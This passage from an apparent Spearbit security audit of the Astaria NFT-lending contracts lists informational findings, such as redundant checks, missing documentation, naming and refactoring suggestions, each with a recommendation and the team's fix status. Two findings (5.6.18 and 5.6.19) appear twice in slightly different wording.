Recommendation: It is recommend to add the compiler version pragma to this file: pragma solidity x.y.z; +5.6.12 zone and zoneHash are not required for fully open Seaport orders Severity: Informational Context: CollateralToken.sol#L524-L530 Description: As per Seaport's documentation,zone and zoneHash are not required for PUBLIC orders: The zone of the order is an optional secondary account attached to the order with two additional privi- leges: • The zone may cancel orders where it is named as the zone by calling cancel. (Note that offerers can also cancel their own orders, either individually or for all orders signed with their current counter at once by calling incrementCounter). • "Restricted" orders (as specified by the order type) must either be executed by the zone or the offerer, or must be approved as indicated by a call to an isValidOrder or isValidOrderIncludingEx- traData view function on the zone. 70 This order isn't "Restricted", and there is no way to cancel a Seaport order once created from this contract. Recommendation: You can consider removing zone and zoneHash if the plan is to keep Seaport orders fully open. Note: If applying this recommendation, applying this issue's fix is mandatory to Issue 150. +5.6.13 Inconsistent treatment of delegate setting Severity: Informational Context: VaultImplementation.sol#L195 Description: Private vaults include delegate in the allow list when deployed through the Router. Public vaults do not. The VaultImplementation, when mutating a delegate, sets them on allow list. Recommendation: Make consistent or note decision to have different deploy behaviors. +5.6.14 AstariaRouter does not adhere to EIP1967 spec Severity: Informational Context: AstariaRouter.sol#L48 Description: The Router serves as an implementation Beacon for proxy contracts, however, does not adhere to the EIP1967 spec. Recommendation: Inherit compliant IBeacon (e.g. OpenZeppelin) and make conform to the spec. +5.6.15 Type mismatch stack.point.end Severity: Informational Context: LienToken.sol#L757, PublicVault.sol#L509 Description: stack.point.end is uint40 but used elsewhere as uint64. +5.6.16 Receiver of bought out lien must be approved by msg.sender Severity: Informational Context: LienToken.sol#L107-111 Description: The buyoutLien function requires that either the receiver of the lien is msg.sender or is an address approved by msg.sender: if (msg.sender != params.encumber.receiver) { require( _loadERC721Slot().isApprovedForAll[msg.sender][params.encumber.receiver] ); } This check seems unnecessary and in some cases will block users from buying out liens as intended. Recommendation: Remove this check. Once it is removed, we can also remove the update at VaultImplementation.sol#L331-336 for private vaults to approve the vault owner before buyoutLien() is called: if ( recipient() != address(this) && !lienToken.isApprovedForAll(address(this), recipient()) ) { lienToken.setApprovalForAll(recipient(), true); } 71 Astaria: Fixed in PR 204. Spearbit: Verified, updates in this PR 276solve the issue. 
+5.6.17 A new modifier onlyLienToken() can be defined to refactor logic
Severity: Informational
Context:
• PublicVault.sol#L487
• PublicVault.sol#L525
• PublicVault.sol#L574
• PublicVault.sol#L588
• PublicVault.sol#L604
Description: The following require statement has been used in multiple locations in PublicVault:

require(msg.sender == address(LIEN_TOKEN()));

Locations used:
• beforePayment
• afterPayment
• handleBuyoutLien
• updateAfterLiquidationPayment
• updateVaultAfterLiquidation
Recommendation: It would be best to consolidate this condition into a modifier:

modifier onlyLienToken() {
  require(msg.sender == address(LIEN_TOKEN()));
  _;
}

+5.6.18 A redundant if block can be removed from PublicVault._afterCommitToLien
Severity: Informational
Context:
• PublicVault.sol#L428-L430
• PublicVault.sol#L443
Description: In PublicVault._afterCommitToLien, we have the following if block:

if (s.last == 0) {
  s.last = block.timestamp.safeCastTo40();
}

This if block is redundant: regardless of the value of s.last, _accrue(s), called a few lines earlier, already updates s.last to the current timestamp.
Recommendation: The if block above can be removed. And perhaps, to emphasize that the s.last value is updated in _accrue(s), we can leave a comment for it on a line above in the _afterCommitToLien body.

+5.6.19 Private vaults' deposit endpoints can potentially be simplified
Severity: Informational
Context: Vault.sol#L74-L77
Description: A private vault's deposit function can be called directly or indirectly using the ROUTER() (either way by anyone), and we have the following require statement:

require(
  s.allowList[msg.sender] ||
  (msg.sender == address(ROUTER()) && s.allowList[receiver])
);

If the ROUTER() is the AstariaRouter implementation of IAstariaRouter, then it inherits from ERC4626RouterBase and ERC4626Router, which allows anyone to call into deposit of this private vault using:
• depositToVault
• depositMax
• ERC4626RouterBase.deposit
Thus, if any one of the above functions is called through the ROUTER(), msg.sender == address(ROUTER()) will be true. Also, note that when private vaults are created using newVault, the msg.sender/owner along with the delegate are added to the allowList, and the allow list is enabled. And since there is no bookkeeping here for the receiver, except for this require statement, that means:
• Only the owner or the delegate of this private vault can call directly into deposit, or
• Anyone else can set the to address parameter of one of those 3 endpoints above to the owner or delegate to deposit assets (wETH in the current implementation) into the private vault.
And all the assets can be withdrawn by the owner only.
Recommendation: We suggest documenting the above paths. The restriction on the receiver would make sense to make sure end users are aware that they are sending assets through the ROUTER() to an allow-listed user of the private vault, and to avoid potential deposit mistakes.
+5.6.18 A redundant if block can be removed from PublicVault._afterCommitToLien Severity: Informational Context: • PublicVault.sol#L428-L430 • PublicVault.sol#L443 Description: In PublicVault._afterCommitToLien, we have the following if block: if (s.last == 0) { s.last = block.timestamp.safeCastTo40(); } This if block is redundant, since regardless of the value of s.last, the call to _accrue(s) a few lines earlier already updates s.last to the current timestamp. Recommendation: The if block above can be removed. To emphasize that s.last is updated in _accrue(s), a comment can be left on a line above in the _afterCommitToLien body.
+5.6.19 Private vaults' deposit endpoints can potentially be simplified Severity: Informational Context: Vault.sol#L74-L77 Description: A private vault's deposit function can be called directly or indirectly through the ROUTER() (either way by anyone), and we have the following require statement: require( s.allowList[msg.sender] || (msg.sender == address(ROUTER()) && s.allowList[receiver]) ); If the ROUTER() is the AstariaRouter implementation of IAstariaRouter, then it inherits from ERC4626RouterBase and ERC4626Router, which allow anyone to call into deposit of this private vault using: • depositToVault • depositMax • ERC4626RouterBase.deposit Thus, if any one of the above functions is called through the ROUTER(), msg.sender == address(ROUTER()) will be true. Also note that when private vaults are created using newVault, the msg.sender/owner along with the delegate are added to the allowList, and the allow list is enabled. Since there is no bookkeeping here for the receiver except this require statement, that means: • only the owner or the delegate of this private vault can call directly into deposit, or • anyone else can set the to parameter of one of the 3 endpoints above to the owner or delegate to deposit assets (wETH in the current implementation) into the private vault. All the assets can be withdrawn by the owner only. Recommendation: We suggest documenting the above paths. The restriction on the receiver would make sense to ensure that end users are aware they are sending assets through the ROUTER() to an allow-listed user of the private vault, and to avoid potential deposit mistakes. It would also make sense to simplify the require statement: require(s.allowList[receiver]); The current form of the require statement is also acceptable, although it would be best to document why this choice was taken (gas saving for the owner/delegate to set the receiver to address(0)).
+5.6.20 The require statement in decreaseEpochLienCount can be more strict Severity: Informational Context: PublicVault.sol#L498 Description: decreaseEpochLienCount has the following require statement that limits who can call into it: require( msg.sender == address(ROUTER()) || msg.sender == address(LIEN_TOKEN()) ); So only the ROUTER() and LIEN_TOKEN() are allowed to call into it, but AstariaRouter never calls into this function. Recommendation: If you are not planning to add new functionality to AstariaRouter that would call into a public vault's decreaseEpochLienCount endpoint, it is recommended to make this require statement more strict: require(msg.sender == address(LIEN_TOKEN()));
+5.6.21 amount is not used in _afterCommitToLien Severity: Informational Context: PublicVault.sol#L414 Description: amount is not used in _afterCommitToLien to update/decrement s.yIntercept, because even though assets have been transferred out of the vault, they would still need to be paid back, so the net effect on s.yIntercept (which is used in the calculation of the total virtual assets) is 0. Recommendation: Comment out amount, and perhaps provide an explanation in a NatSpec @dev of the reason it is not used: function _afterCommitToLien( uint40 lienEnd, uint256 lienId, uint256 /* amount */ , uint256 lienSlope ) internal virtual override { Also, since _afterCommitToLien is only overridden with an actual implementation in this scenario, if amount is not needed it can be removed from the function signature completely.
+5.6.22 Use modifiers Severity: Informational Context: AstariaRouter.sol#L270, AstariaRouter.sol#L264, VaultImplementation.sol#L67-L99, VaultImplementation.sol#L131, VaultImplementation.sol#L196 Description: The highlighted code has require checks on msg.sender which can be converted to modifiers. For instance: require(address(msg.sender) == s.guardian); Recommendation: Replace these checks with modifiers.
+5.6.23 Prefer SafeCastLib for typecasting Severity: Informational Context: AstariaRouter.sol#L95-L106 Description: The highlighted code typecasts several constant values. If some value does not fit in the target type, the cast will silently drop the higher-order bits. That is currently not the case, but it may pose a risk if these values are changed in the future. Recommendation: Consider using SafeCastLib for all typecasts (a sketch follows). Astaria: Acknowledged. Spearbit: Acknowledged.
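A minimal sketch using solmate's SafeCastLib, which the codebase already uses elsewhere (e.g. safeCastTo40); the contract name is illustrative and the import path depends on your remappings:

    pragma solidity ^0.8.0;

    import {SafeCastLib} from "solmate/src/utils/SafeCastLib.sol";

    contract CastExample {
        using SafeCastLib for uint256;

        // Reverts instead of silently truncating when the value does not fit.
        function toUint32(uint256 value) external pure returns (uint32) {
            return value.safeCastTo32();
        }
    }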
+5.6.24 Rename Multicall to Multidelegatecall Severity: Informational Context: Multicall.sol Description: Multicall.sol performs multiple delegatecalls, so the name Multicall is not suitable; the contract and the file should be named Multidelegatecall. Recommendation: Update the name to Multidelegatecall, or replace delegatecall with call.
+5.6.25 safeTransferFrom() without the data argument can be used Severity: Informational Context: CollateralToken.sol#L347 Description: The highlighted code sends empty data over an external call via ERC721.safeTransferFrom(from, to, tokenId, data): IERC721(underlyingAsset).safeTransferFrom( address(this), releaseTo, assetId, "" ); The data argument can be removed, since ERC721.safeTransferFrom(from, to, tokenId) sends empty data too. Recommendation: Remove the empty data argument from safeTransferFrom(). Astaria: Fixed in commit f63183. Spearbit: Verified.
+5.6.26 Fix documentation stating that updateVaultAfterLiquidation can be called by LIEN_TOKEN, not ROUTER Severity: Informational Context: PublicVault.sol#L608 Description: The function has the correct validation that it can only be called by LIEN_TOKEN(), but the comment says it can only be called by ROUTER(): require(msg.sender == address(LIEN_TOKEN())); // can only be called by router Recommendation: Update the comment to say lien token, or remove the comment entirely.
+5.6.27 Declare events and constants at the beginning Severity: Informational Context: CollateralToken.sol#L598, VaultImplementation.sol#L150 Description: Events and constants are generally declared at the beginning of a smart contract; for the highlighted code, that is not the case. Recommendation: Move the event and constant declarations to the beginning of the contract. Astaria: Fixed in commit b55058. Spearbit: Verified.
+5.6.28 Rename Vault to PrivateVault Severity: Informational Context: Vault.sol#L34 Description: The Vault contract is used to represent private vaults. Recommendation: To better distinguish private and public vaults, it would be best to rename the Vault contract/file to PrivateVault. Note that public vaults are already called PublicVault.
+5.6.29 Remove comment Severity: Informational Context: WithdrawProxy.sol#L229 Description: The comment at WithdrawProxy.sol#L229 can be removed: if ( block.timestamp < s.finalAuctionEnd // || s.finalAuctionEnd == uint256(0) ) { The condition in the comment is always false, as the code already reverts in that case. Recommendation: Remove the comment. Astaria: Fixed in commit 861bf. Spearbit: Verified.
+5.6.30 WithdrawProxy and PrivateVault symbols are missing hyphens Severity: Informational Context: • WithdrawProxy.sol#L113 • Vault.sol#L55 Description: The symbol for the WithdrawProxy token is missing a hyphen after the W, which will make the name AST-W0x... instead of AST-W-0x.... Similarly, the symbol for the private vault token (in Vault.sol) is missing a hyphen after the V. Recommendation: - string(abi.encodePacked("AST-W", owner(), "-", ERC20(asset()).symbol())); + string(abi.encodePacked("AST-W-", owner(), "-", ERC20(asset()).symbol())); - string(abi.encodePacked("AST-V", owner(), "-", ERC20(asset()).symbol())); + string(abi.encodePacked("AST-V-", owner(), "-", ERC20(asset()).symbol()));
+5.6.31 Lien cannot be bought out after stack.point.end Severity: Informational Context: LienToken.sol#L731 Description: The _getRemainingInterest function reverts with Panic(0x11) when block.timestamp > stack.point.end. Recommendation: If intentional, include an explicit check with an informative error message (a sketch follows), or document the decision.
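A minimal sketch of the explicit check, assuming a simplified Point struct; the LienEnded error and the stand-in interest computation are illustrative:

    pragma solidity ^0.8.0;

    contract LienExample {
        struct Point { uint40 end; }

        error LienEnded(uint40 end, uint256 timestamp);

        function _getRemainingInterest(Point memory point) internal view returns (uint256) {
            // Fail loudly instead of with an arithmetic underflow Panic(0x11).
            if (block.timestamp > point.end) revert LienEnded(point.end, block.timestamp);
            return uint256(point.end) - block.timestamp; // stand-in for the real computation
        }
    }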
+5.6.32 Inconsistent strictness of inequalities in isValidRefinance Severity: Informational Context: AstariaRouter.sol#L593-612 Description: In isValidRefinance, we check that either: a) newRate < maxNewRate && newEnd >= oldEnd, or b) newEnd - oldEnd >= minDurationIncrease && newRate <= oldRate. We should be consistent in whether the changes are enforced with strict or non-strict inequalities. Recommendation: Use strict inequalities (for slightly better gas performance) for the variables that need to improve; in other words, keep newRate < maxNewRate as is, but change the duration check to newEnd - oldEnd > minDurationIncrease. Alternatively, you could use non-strict inequalities and change the rate check to newRate <= maxNewRate. Astaria: Fixed in commit 0d2e24c. Spearbit: Verified.
+5.6.33 Lengthy comments Severity: Informational Context: AstariaRouter.sol#L58, LienToken.sol#L38 Description: The Context provides a few examples of lengthy comments. For readability, it is better to restrict the comment length per line; the Solidity guidelines suggest 120 characters. Recommendation: Convert lengthy single-line comments into multiple lines. To identify these comments, run awk 'length>120' *.sol in src.
+5.6.34 Clarify comments Severity: Informational Context: CollateralToken.sol#L524-L532 Description: A few comments are not clear on what they refer to: zone: address(this), // 0x20 ... conduitKey: s.CONDUIT_KEY, // 0x120 Recommendation: Elaborate on these comments, or remove them if they are not useful.
+5.6.35 Remove unused files Severity: Informational Context: CallUtils.sol Description: CallUtils.sol is not used anywhere in the codebase. Recommendation: Remove CallUtils.sol.
+5.6.36 Document privileges and the entities holding them Severity: Informational Context: astaria-core Description: There are certain privileged functionalities in the codebase (recognized through the requiresAuth modifier). Currently, we have to refer to tests to identify the setup. Recommendation: Document these privileges along with the entities holding them. Also document the process of setting up Auth/Authority for the contracts.
+5.6.37 Document and ensure that the maximum number of liens is not set greater than 256 Severity: Informational Context: LienToken.sol#L625, LienToken.sol#L373-L375, LienToken.sol#L64 Description: The maximum number of liens in a stack is currently set to 5. While paying for a lien, the index in the stack is cast to uint8, which makes the implicit limit on the maximum number of liens 256. Recommendation: Document this restriction, and in case of any upgrade to this cap, ensure that all related components are upgraded together to avoid the case where casting down to uint8 becomes unsafe.
+5.6.38 transferWithdrawReserve() can return early when the current epoch is 0 Severity: Informational Context: • PublicVault.sol#L338 • PublicVault.sol#L341 • PublicVault.sol#L380 • PublicVault.sol#L372 Description: If s.currentEpoch == 0, s.currentEpoch - 1 will wrap around to type(uint256).max and we would most probably drain assets into address(0) in the following block: unchecked { s.withdrawReserve -= WithdrawProxy(withdrawProxy) .drain( s.withdrawReserve, s.epochData[s.currentEpoch - 1].withdrawProxy ) .safeCastTo88(); } But this cannot happen, since in the outer if block the condition s.withdrawReserve > 0 indirectly implies that s.currentEpoch > 0. This implication stems from the fact that s.withdrawReserve is only set in the transferWithdrawReserve() function or in processEpoch(): in transferWithdrawReserve() it only takes a positive value when s.currentEpoch > uint64(0), and processEpoch() increments s.currentEpoch at its end. Recommendation: It would be more readable to rewrite this function so that the if (s.currentEpoch > uint64(0)) check is turned into an early exit, since it is a directly or indirectly implied condition for the whole function:
if (s.currentEpoch == uint64(0)) { return; }
+5.6.39 Two inner if blocks of processEpoch() check a condition that has already been checked by an outer if block Severity: Informational Context: PublicVault.sol#L247 Description: The following two if checks are redundant: if (address(currentWithdrawProxy) != address(0)) { currentWithdrawProxy.setWithdrawRatio(s.liquidationWithdrawRatio); } uint256 expected = 0; if (address(currentWithdrawProxy) != address(0)) { expected = currentWithdrawProxy.getExpected(); } The condition address(currentWithdrawProxy) != address(0) has already been checked by an outer if block. Recommendation: The two if blocks can be transformed into: currentWithdrawProxy.setWithdrawRatio(s.liquidationWithdrawRatio); uint256 expected = currentWithdrawProxy.getExpected();
+5.6.40 General formatting suggestions Severity: Informational Context: PublicVault.sol#L283 Description: PublicVault.sol#L283: there are extra surrounding parentheses. Recommendation: The extra parentheses can be removed: if (address(currentWithdrawProxy) != address(0)) {
+5.6.41 Identical collateral check is performed twice in _createLien Severity: Informational Context: LienToken.sol#L383-393 Description: In _createLien, a check is performed that the collateralId of the new lien matches the collateralId of the first lien on the stack: if (params.stack.length > 0) { if (params.lien.collateralId != params.stack[0].lien.collateralId) { revert InvalidState(InvalidStates.COLLATERAL_MISMATCH); } } This identical check is performed twice (L383-387 and L389-393). Recommendation: Delete L389-393. Astaria: Fixed in commit 81a542. Spearbit: Verified.
+5.6.42 A checkAllowlistAndDepositCap modifier can be defined to consolidate some of the mint and deposit logic for public vaults Severity: Informational Context: • PublicVault.sol#L202-L210 • PublicVault.sol#L226-L234 Description: The following code snippet is used in both the mint and deposit endpoints of a public vault: VIData storage s = _loadVISlot(); if (s.allowListEnabled) { require(s.allowList[receiver]); } uint256 assets = totalAssets(); if (s.depositCap != 0 && assets >= s.depositCap) { revert InvalidState(InvalidStates.DEPOSIT_CAP_EXCEEDED); } Recommendation: The snippet above can be transformed into a modifier checkAllowlistAndDepositCap(address receiver) to consolidate some of the logic (see the sketch after 5.6.43). It would also simplify the codebase.
+5.6.43 Document why bytes4(0xffffffff) is chosen when CollateralToken acts as a Seaport zone to signal invalid orders Severity: Informational Context: • CollateralToken.sol#L148 • CollateralToken.sol#L163 Description: CollateralToken's isValidOrder and isValidOrderIncludingExtraData return bytes4(0xffffffff) to indicate that a Seaport order using this zone is not a valid order. Recommendation: Document why the specific value of bytes4(0xffffffff) was chosen to indicate the invalidity of an order using CollateralToken as a zone. Seaport uses this value in one of its test files, and EIP-165 uses this magic value to indicate an unsupported interface.
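A sketch of the modifier suggested in 5.6.42; VIData, _loadVISlot, and totalAssets are simplified stand-ins for the existing vault internals:

    pragma solidity ^0.8.0;

    abstract contract VaultGuards {
        struct VIData {
            bool allowListEnabled;
            uint88 depositCap;
            mapping(address => bool) allowList;
        }

        error DepositCapExceeded();

        function _loadVISlot() internal view virtual returns (VIData storage);
        function totalAssets() public view virtual returns (uint256);

        modifier checkAllowlistAndDepositCap(address receiver) {
            VIData storage s = _loadVISlot();
            if (s.allowListEnabled) {
                require(s.allowList[receiver]);
            }
            if (s.depositCap != 0 && totalAssets() >= s.depositCap) {
                revert DepositCapExceeded();
            }
            _;
        }
    }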
+5.6.44 CollateralToken.onERC721Received's use of the depositFor stack variable is redundant Severity: Informational Context: CollateralToken.sol#L652-L665 Description: If we follow the logic of assigning values to depositFor in CollateralToken.onERC721Received, we notice that it always ends up being from_, so its usage is redundant. Recommendation: Remove depositFor from CollateralToken.onERC721Received and replace its usage with from_: _mint(from_, collateralId); s.idToUnderlying[collateralId] = Asset({ tokenContract: msg.sender, tokenId: tokenId_ }); emit Deposit721(msg.sender, tokenId_, collateralId, from_); Also, if the above change is applied, operator_ will no longer be used, so it can be commented out in the function signature: function onERC721Received( address /* operator_ */ , address from_, uint256 tokenId_, bytes calldata data_ ) external
+5.6.45 An onlyOwner modifier can be defined to simplify the codebase Severity: Informational Context: • CollateralToken.sol#L323-L326 • CollateralToken.sol#L254-L259 Description: releaseToAddress checks whether msg.sender is the owner of a collateral. CollateralToken already has an onlyOwner(...) modifier, so the initial check in releaseToAddress can be delegated to the modifier. Recommendation: releaseToAddress can be changed to the following to take advantage of the onlyOwner modifier: function releaseToAddress(uint256 collateralId, address releaseTo) public releaseCheck(collateralId) onlyOwner(collateralId) // <-- added modifier { CollateralStorage storage s = _loadCollateralSlot(); _releaseToAddress(s, collateralId, releaseTo); } The only difference is that releaseToAddress uses a custom error to revert, while the modifier uses a require statement.
+5.6.46 Document the liquidator's role in the protocol Severity: Informational Context: • AstariaRouter.sol#L519 • CollateralToken.sol#L107 • LienToken.sol#L472-L477 Description: When a lien's term ends (stack.point.end <= block.timestamp), anyone can call liquidate on AstariaRouter; there is no restriction on msg.sender. The msg.sender will be set as the liquidator, and: • if the Seaport auction ends (3 days currently, set by the protocol), they can call liquidatorNFTClaim to claim the NFT; • or, if the Seaport auction settles, the liquidator receives the liquidation fee. Recommendation: Document the liquidator's role in the protocol, covering the points mentioned in the Description.
+5.6.47 Until ASTARIA_ROUTER gets filed for CollateralToken, CollateralToken cannot safely receive ERC721s Severity: Informational Context: CollateralToken.sol#L72-L78 Description: ASTARIA_ROUTER is not set in CollateralToken's constructor. So until an entity with authority files for it, CollateralToken is unable to safely receive an ERC721 token (whenNotPaused and onERC721Received would revert). Recommendation: If this is part of the design, it would be useful to have it documented.
+5.6.48 _getMaxPotentialDebtForCollateral might have been meant to be an internal function Severity: Informational Context: LienToken.sol#L667-L668 Description: _getMaxPotentialDebtForCollateral is defined as a public function, yet its name starts with _, which by convention is usually used for internal or private functions. Recommendation: If it is necessary to use this pure function off-chain, it is recommended to change its name to not start with _; if it is meant to be an internal function, make sure to change its visibility to internal. _getMaxPotentialDebtForCollateral was made internal in PR 102.
+5.6.49 The return keyword can be removed from stopLiens Severity: Informational Context: LienToken.sol#L240-L247 Description: _stopLiens does not return any values, but in stopLiens the return statement is used with the non-existent return value of _stopLiens.
Recommendation: stopLiens can be changed to: - return _stopLiens( _loadLienStorageSlot(), collateralId, auctionWindow, stack, liquidator );
+5.6.50 LienToken's constructor does not set ASTARIA_ROUTER, which makes some of the endpoints non-functional Severity: Informational Context: LienToken.sol#L56-L65 Description: LienToken's constructor does not set ASTARIA_ROUTER. That means that until an authorized entity calls file to set this parameter, the following functions are broken/revert: • buyoutLien • _buyoutLien • _payDebt • getBuyout • _getBuyout • _isPublicVault • setPayee (partially broken) • _paymentAH • payDebtViaClearingHouse Recommendation: Document the design decision not to set ASTARIA_ROUTER in the constructor. Astaria: Working as intended. Spearbit: Acknowledged.
+5.6.51 Document the approval process for a user's CollateralToken before calling commitToLiens Severity: Informational Context: • AstariaRouter.sol#L680-L683 • VaultImplementation.sol#L232 Description: In _executeCommitment's return statement: IVaultImplementation(c.lienRequest.strategy.vault).commitToLien( c, address(this) ); address(this) is the AstariaRouter. The call to commitToLien enters _validateCommitment with AstariaRouter as the receiver, so for it not to revert, the holder needs to have set approval for the router beforehand: CT.isApprovedForAll(holder, receiver) // needs to be true Recommendation: Document for users that, in order to commit to liens, they need to approve all of their CollateralToken tokens for AstariaRouter, so that AstariaRouter can act as an operator/spender (a usage sketch follows 5.6.52).
+5.6.52 isValidRefinance's return statement can be reformatted Severity: Informational Context: AstariaRouter.sol#L606-L611 Description: Currently, the return statement of isValidRefinance is a bit hard to read. Recommendation: We suggest reformatting the statement similar to the following for better readability: ( newLien.details.rate < maxNewRate && block.timestamp + newLien.details.duration >= stack[position].point.end ) || ( newLien.details.rate <= stack[position].lien.details.rate && block.timestamp + newLien.details.duration - stack[position].point.end >= s.minDurationIncrease );
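A usage sketch for 5.6.51; the collateralToken and astariaRouter variables and the commitments argument are illustrative:

    // The holder approves the router as an operator on CollateralToken once:
    collateralToken.setApprovalForAll(address(astariaRouter), true);
    // Afterwards, commitments routed through the router pass
    // _validateCommitment's CT.isApprovedForAll(holder, receiver) check:
    astariaRouter.commitToLiens(commitments);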
+5.6.53 Withdraw reserves should always be transferred before committing to a lien Severity: Informational Context: PublicVault.sol#L387-398 Description: When a new lien is requested, the _beforeCommitToLien() function is called. If the epoch is over, this calls processEpoch(); otherwise, it calls transferWithdrawReserve(): function _beforeCommitToLien( IAstariaRouter.Commitment calldata params, address receiver ) internal virtual override(VaultImplementation) { VaultData storage s = _loadStorageSlot(); if (timeToEpochEnd() == uint256(0)) { processEpoch(); } else if (s.withdrawReserve > uint256(0)) { transferWithdrawReserve(); } } However, processEpoch() will fail if the withdraw reserves haven't been transferred. In that case, the user would have to manually call transferWithdrawReserve() to fix things and then request their lien again. Instead, the protocol should transfer the reserves whenever needed, and only then call processEpoch(). Recommendation: function _beforeCommitToLien( IAstariaRouter.Commitment calldata params, address receiver ) internal virtual override(VaultImplementation) { VaultData storage s = _loadStorageSlot(); - if (timeToEpochEnd() == uint256(0)) { - processEpoch(); - } else if (s.withdrawReserve > uint256(0)) { - transferWithdrawReserve(); - } + if (s.withdrawReserve > uint256(0)) { + transferWithdrawReserve(); + } + if (timeToEpochEnd() == uint256(0)) { + processEpoch(); + } } Astaria: Fixed in PR 189. Spearbit: Verified.
+5.6.54 Remove the owner() variable from withdraw proxies Severity: Informational Context: PublicVault.sol#L182-192 Description: When a withdrawProxy is deployed, it is created with certain immutable arguments. Two of these values, owner() and vault(), will always be equal; they seem to be used interchangeably on the withdraw proxy itself, so they should be consolidated into one variable. Recommendation: Remove owner from the immutable arguments passed to withdrawProxy, and change all instances of owner() to vault(). Astaria: Fixed in PR 190. Spearbit: Verified.
+5.6.55 Unnecessary checks in _validateCommitment Severity: Informational Context: VaultImplementation.sol#L220-234 Description: In _validateCommitment(), we check that the sender of the message is adequately qualified to make the decision to take a lien against the collateral (i.e. they are the holder, the operator, etc.). However, the way this is checked is somewhat roundabout and can be substantially simplified. For example, we check require(operator == receiver); in a block that is only triggered if we have already validated that receiver != operator. Recommendation: To fix these unnecessary checks, we recommend refactoring as follows: address holder = CT.ownerOf(collateralId); address operator = CT.getApproved(collateralId); if ( msg.sender != holder && receiver != holder && receiver != operator && - !ROUTER().isValidVault(receiver) + !ROUTER().isValidVault(receiver) && + !CT.isApprovedForAll(holder, receiver) ) { - if (operator != address(0)) { - require(operator == receiver); - } else { - require(CT.isApprovedForAll(holder, receiver)); - } + revert ReceiverIsNotAllowed(); } However, there are larger issues with this validation, and fixing those will resolve this. See PR 75.
+5.6.56 Comment out or remove unused function parameters Severity: Informational Context: • LienToken.sol#L573 • CollectionValidator.sol#L51 • CollateralToken.sol#L627 • VaultImplementation.sol#L107-L110 • PublicVault.sol#L389 • PublicVault.sol#L537 • LienToken.sol#L195 • LienToken.sol#L294 • LienToken.sol#L410 • LienToken.sol#L726 • VaultImplementation.sol#L341 Description: The highlighted functions take arguments which are never used. If the function has to have a particular signature, comment out the argument name; otherwise, remove the argument completely. Additional instances noted in the Context above: • LienToken.sol#L726: the LienStorage storage s input parameter is not used in _getRemainingInterest; it can be removed, and the function can be made pure. • VaultImplementation.sol#L341: incoming is not used in buyoutLien; was this variable meant to be used? Recommendation: Remove collateralId from _paymentAH()'s arguments. If commenting out a parameter while keeping its type to conform to a particular signature, you can use the following form: function f( A a, B b, ... C /* c */ , ... X x ) ...
+5.6.57 Zero address check can never fail Severity: Informational Context: CollectionValidator.sol#L63, UNI_V3Validator.sol#L93, UniqueValidator.sol#L64 Description: The details.borrower != address(0) check will never be false in the current system, as AstariaRouter.sol#L352-L354 will revert when ownerOf is address(0). Recommendation: If this check is intended to assist off-chain calls to validateAndParse, consider reverting whenever details.borrower != address(0).
+5.6.58 UX differs between Router.commitToLiens and VaultImplementation.commitToLien Severity: Informational Context: VaultImplementation.sol#L277 Description: The Router function creates the collateralized token, while VaultImplementation requires the collateral owner to ERC721.safeTransferFrom to the CollateralToken contract prior to calling. Recommendation: UX implications only. Confirm this is the desired behavior and document it.
+5.6.59 Document which vaults are listed by Astaria Severity: Informational Context: AstariaRouter.sol#L443 Description: Anyone can call newPublicVault with an epochLength in the correct range to create a public vault. Recommendation: It would be best to document the process of listing and selecting public vaults, as the protocol currently allows anyone to register a public vault. Astaria: This is correct; anyone can deploy a public vault, but the UI will only show vaults by whitelisted strategists. Spearbit: Acknowledged.
+5.6.60 Simplify nested if/else blocks in for loops Severity: Informational Context: • AstariaRouter.sol#L196 • AstariaRouter.sol#L268 • CollateralToken.sol#L191 • LienToken.sol#L77 Description: There are quite a few instances where a nested if/else block is used in a for loop and is the only block in the loop: for ( ... ) { if () { ... } else if () { ... } ... else if () { ... } else { revert CustomError(); } } Recommendation: For better readability, it might be best to transform these blocks into single if blocks and use the continue keyword instead: for ( ... ) { if ( ) { ... continue; } if ( ) { ... continue; } ... if ( ) { ... continue; } revert CustomError(); }
+5.6.61 Document the role the guardian plays in the protocol Severity: Informational Context: AstariaRouter.sol Description: The role of the guardian is not documented. Recommendation: Document that the guardian can file or update the implementations, COLLATERAL_TOKEN, LienToken, and TRANSFER_PROXY. If there are other actions or roles that the guardian can take or is supposed to have, they should also be documented.
+5.6.62 The strategistFee... parameters are not used and can be removed from the codebase Severity: Informational Context: • AstariaRouter.sol#L219-L220 • IAstariaRouter.sol#L79-L80 Description: strategistFeeNumerator and strategistFeeDenominator are not used except in getStrategistFee (which itself is not referred to by other contracts). It looks like these have been replaced by the vault fee, which is set by public vault owners when they create the vault. Recommendation: Remove these two storage parameters if there are no plans to use them in the future.
+5.6.63 redeemFutureEpoch can be called directly on a public vault to avoid using the endpoint on AstariaRouter Severity: Informational Context: • AstariaRouter.sol#L110 • PublicVault.sol#L128 Description: One can call the redeemFutureEpoch endpoint of the vault directly to avoid the extra gas of juggling assets and multiple contract calls when using the endpoint on AstariaRouter.
Recommendation: Document the decision of having the endpoint on AstariaRouter, and/or why the same endpoint on the public vault has no restriction and can be called by any actor.
+5.6.64 Remove unused imports Severity: Informational Context: • AstariaRouter.sol#L30 • AstariaRouter.sol#L37 • AstariaRouter.sol#L39 • AstariaRouter.sol#L40 • LienToken.sol#L24 • PublicVault.sol#L13 • PublicVault.sol#L22 • PublicVault.sol#L23 • PublicVault.sol#L35 • Vault.sol#L13 • Vault.sol#L15 • Vault.sol#L16 • Vault.sol#L18 • Vault.sol#L21 • Vault.sol#L24-L27 • Vault.sol#L29 • WithdrawProxy.sol#L13 • WithdrawProxy.sol#L21 • ERC20-Cloned.sol#L4 • ERC20-Cloned.sol#L5 Description: If an imported file is not used, it can be removed. • LienToken.sol#L24: since Base64 is only imported in this file, if unused it can be removed from the codebase. Recommendation: Remove the unused imports.
+5.6.65 Reduce nesting by reverting early Severity: Informational Context: CollateralToken.sol#L645-L669 Description: Code following this pattern: if (condition) { ... } else { revert(); } can be simplified to remove nesting using custom errors: if (!condition) { revert(); } or, if using require statements: require(condition); Recommendation: Check for invalid conditions and revert early. The suggested patterns make the codebase more readable.
+5.6.66 assembly can read constant global variables Severity: Informational Context: WithdrawProxy.sol#L190-L192, Pausable.sol#L39, ERC20-Cloned.sol#L26 Description: Inline assembly cannot read most global variables, but that is not true for constant variables, as their values are embedded in the bytecode. For instance, the highlighted code has the following pattern: bytes32 slot = WITHDRAW_PROXY_SLOT; assembly { s.slot := slot } Here, WITHDRAW_PROXY_SLOT is a constant which can be used directly in the assembly code. Recommendation: Use constant variables directly in assembly code.
